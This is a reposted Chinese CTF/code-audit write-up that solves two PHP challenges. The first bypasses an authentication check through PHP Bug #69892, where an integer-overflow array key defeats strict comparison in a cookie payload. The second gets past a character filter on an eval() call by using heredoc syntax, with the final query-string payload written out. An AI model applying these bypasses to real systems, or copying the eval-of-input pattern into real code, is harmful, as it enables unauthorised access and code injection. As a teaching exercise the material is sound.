热门搜索:
您现在的位置是:首页 > 文章详情

小组任务1(phpbug#69892)

日期:2018-06-30点击:468

参考文献:https://github.com/CHYbeta/Code-Audit-Challenges

1.php的Bug#69892 

$users = array( "0:9b5c3d2b64b8f74e56edec71462bd97a" , "1:4eb5fb1501102508a86971773849d266", "2:facabd94d57fc9f1e655ef9ce891e86e", "3:ce3924f011fe323df3a6a95222b0c909", "4:7f6618422e6a7ca2e939bd83abde402c", "5:06e2b745f3124f7d670f78eabaa94809", //hund "6:8e39a6e40900bb0824a8e150c0d0d59f", "7:d035e1a80bbb377ce1edce42728849f2", "8:0927d64a71a9d0078c274fc5f4f10821", "9:e2e23d64a642ee82c7a270c6c76df142", "10:70298593dd7ada576aff61b6750b9118" ); $valid_user = false; $input = $_COOKIE['user']; $input[1] = md5($input[1]); foreach ($users as $user) { $user = explode(":", $user); if ($input === $user) { $uid = $input[0] + 0; $valid_user = true; } } if (!$valid_user) { die("not a valid user\n"); } if ($uid == 0) { echo "Hello Admin How can I serve you today?\n"; echo "SECRETS ....\n"; } else { echo "Welcome back user\n"; }

题目其实很容易理解,就是输入user[0]和user[1],其中user[0]==0user[1]=$users中的任意一个

看见0~10这些内容第一反应就是md5解密,都试过一遍之后发现只有第五个能解出来,user[0]=5;user[1]=hund这个就可以得到你是普通用户的欢迎信息了,但是想要的是管理员的,所以得尝试将$uid=0这个条件实现,这个时候就需用到php的Bug#69892

[2015-06-20 14:29 UTC] nikic@php.net 描述: ------------ var_dump([0 => 0] === [0x100000000 => 0]); //布尔(true) 所有版本:http://3v4l.org/Sjdf8</pre>

php运行在32位系统的会将数组的键 0x100000000=2^32=4294967296 变换为字符串,而在64位系统会直接 数组中的键4294967296 为unsigned long 类型 且等同于0

  • 最后的payload
Cookie: user[4294967296]=5;user[1]=hund;

2.PHP 0819

<?php // closure, because of namespace! $challenge = function() { $f = Common::getGetString('eval'); $f = str_replace(array('`', '$', '*', '#', ':', '\\', '"', "'", '(', ')', '.', '>'), '', $f); if((strlen($f) > 13) || (false !== stripos($f, 'return'))){ die('sorry, not allowed!'); } try{ eval("\$spaceone = $f"); } catch (Exception $e){ return false; } return ($spaceone === '1337'); }; ?>

通过get的eval参数传入并赋值到变量f,然后经过str_replace()的过滤,要求长度小于13,并且不包含字符串return,接着执行eval,然后让`spaceone === '1337'返回True。最后一行spaceone === '1337'`,要求类型和值都得相等。看一下str_replace(),过滤了单引号,双引号,所以如果直接get传参`index.php?eval='1337'`进去,在经过过滤后,到最后会变为spaceone=1337,不等。

可以用heredoc构造绕过单引号

<<<EOF 内容 EOF;

内容中不能包括特殊符号,以一个变量起始,以相同的变量名+;结束(还要再加上一个换行符!)

  • 最终payload
?eval=<<<s%0a1337%0as;%0a
原文链接:https://yq.aliyun.com/articles/654374
关注公众号

低调大师中文资讯倾力打造互联网数据资讯、行业资源、电子商务、移动互联网、网络营销平台。

持续更新报道IT业界、互联网、市场资讯、驱动更新,是最及时权威的产业资讯及硬件资讯报道平台。

转载内容版权归作者及来源网站所有,本站原创内容转载请注明来源。

相关文章

    文章评论

    共有0条评论来说两句吧...

    文章二维码

    扫描即可查看该文章

    点击排行

    推荐阅读

    最新文章